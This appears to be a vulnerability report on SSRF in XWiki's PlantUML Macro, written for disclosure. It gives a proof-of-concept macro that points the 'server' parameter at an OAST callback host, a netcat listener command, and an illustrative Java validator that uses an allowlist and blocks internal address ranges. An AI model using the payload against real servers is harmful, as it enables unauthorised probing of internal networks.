h3. Impact

The PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the {{server}} parameter.

However, the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL, and the XWiki server will attempt to connect to that URL in order to render the diagram.

h3. PoC
1. Use an OAST service (like Burp Collaborator) or a local listener ({{nc -lvp 4444}}) to capture the interaction.
2. Create a wiki page with the following content:
{noformat}
{{plantuml server="http://oqiusawt5ny84yw017u6qgnay14ssmgb.oastify.com"}}
@startuml
A -> B: SSRF Test
@enduml
{{/plantuml}}
{noformat}
!image-2025-11-26-06-54-50-628.png!
3. Save and view the page.
!image-2025-11-25-20-31-57-213.png!
4. The XWiki server initiates an HTTP connection to the specified target.
!image-2025-11-25-20-32-25-311.png!

h3. Attribution
Reported by: Łukasz Rybak
GitHub: [https://github.com/lukasz-rybak]
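The missing check described under Impact is a validation of the {{server}} parameter before any connection is made. The following is an added illustration of such a check, written for this report; it is not XWiki's code and not a proposed patch. It assumes Java 16 or later, a hypothetical class name {{PlantUmlServerValidator}}, and a constructed allowlist containing only {{plantuml.example.org}}. Beyond the single case in the PoC, it rejects non-http(s) schemes, embedded credentials, hosts outside the allowlist and any allowlisted name that resolves to loopback, link-local, private, CGNAT, ULA or multicast ranges, and returns the resolved address so the caller connects to what was checked.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.util.List;
import java.util.Set;

// Hypothetical validator for a user-supplied PlantUML "server" parameter.
// Illustrative only; this is not XWiki's own code.
public final class PlantUmlServerValidator {

    // Constructed allowlist: a real deployment would make this administrator-configured.
    private static final Set<String> ALLOWED_HOSTS = Set.of("plantuml.example.org");

    private PlantUmlServerValidator() {}

    /** Validated target: the URI plus the resolved address the HTTP client should use. */
    public record Target(URI uri, InetAddress address) {}

    public static Target validate(String serverParam) {
        if (serverParam == null || serverParam.isBlank()) {
            throw new IllegalArgumentException("server parameter is empty");
        }
        URI uri;
        try {
            uri = new URI(serverParam).normalize();
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("server is not a valid URI", e);
        }
        String scheme = uri.getScheme();
        if (scheme == null || !(scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https"))) {
            throw new IllegalArgumentException("only http(s) servers are permitted");
        }
        if (uri.getUserInfo() != null) {
            throw new IllegalArgumentException("credentials in the server URL are not permitted");
        }
        String host = uri.getHost();
        if (host == null) {
            throw new IllegalArgumentException("server URL has no host");
        }
        host = host.toLowerCase();
        if (!ALLOWED_HOSTS.contains(host)) {
            throw new IllegalArgumentException("server host is not on the allowlist: " + host);
        }
        // Defence in depth: resolve once, reject internal ranges, and return the resolved
        // address so the connection uses the checked address (no DNS-rebinding race
        // between the check and the actual request).
        InetAddress[] addresses;
        try {
            addresses = InetAddress.getAllByName(host);
        } catch (UnknownHostException e) {
            throw new IllegalArgumentException("server host does not resolve", e);
        }
        for (InetAddress a : addresses) {
            if (isInternal(a)) {
                throw new IllegalArgumentException(
                    "server host resolves to an internal address: " + a.getHostAddress());
            }
        }
        return new Target(uri, addresses[0]);
    }

    /** True for address ranges a PlantUML renderer should never be pointed at. */
    static boolean isInternal(InetAddress a) {
        byte[] b = a.getAddress();
        boolean cgnat = b.length == 4 && (b[0] & 0xff) == 100 && (b[1] & 0xc0) == 64; // 100.64.0.0/10
        boolean ula = b.length == 16 && (b[0] & 0xfe) == 0xfc;                         // fc00::/7
        return a.isAnyLocalAddress() || a.isLoopbackAddress() || a.isLinkLocalAddress()
            || a.isSiteLocalAddress() || a.isMulticastAddress() || cgnat || ula;
    }

    // Stand-alone demonstration over constructed inputs; prints one ACCEPT/REJECT line each.
    public static void main(String[] args) throws UnknownHostException {
        List<String> samples = List.of(
            "http://127.0.0.1:8080",
            "http://10.0.0.5/png",
            "file:///etc/hostname",
            "http://user:pw@plantuml.example.org",
            "http://other-host.example/png",
            "https://plantuml.example.org/png");
        for (String s : samples) {
            try {
                Target t = validate(s);
                System.out.println("ACCEPT " + s + " -> " + t.address().getHostAddress());
            } catch (IllegalArgumentException e) {
                System.out.println("REJECT " + s + " (" + e.getMessage() + ")");
            }
        }
        // Literal addresses do not trigger DNS, so the range check can be shown offline.
        for (String ip : List.of("127.0.0.1", "10.0.0.5", "169.254.10.10", "100.64.1.1", "fd00::1", "203.0.113.9")) {
            System.out.println(ip + " internal=" + isInternal(InetAddress.getByName(ip)));
        }
    }
}
```

The last allowlisted sample only succeeds when {{plantuml.example.org}} resolves, so offline it is rejected with "does not resolve"; that is the intended fail-closed behaviour. Any redirect followed by the HTTP client must be re-validated with the same routine, otherwise an allowlisted host can still bounce the request to an internal address.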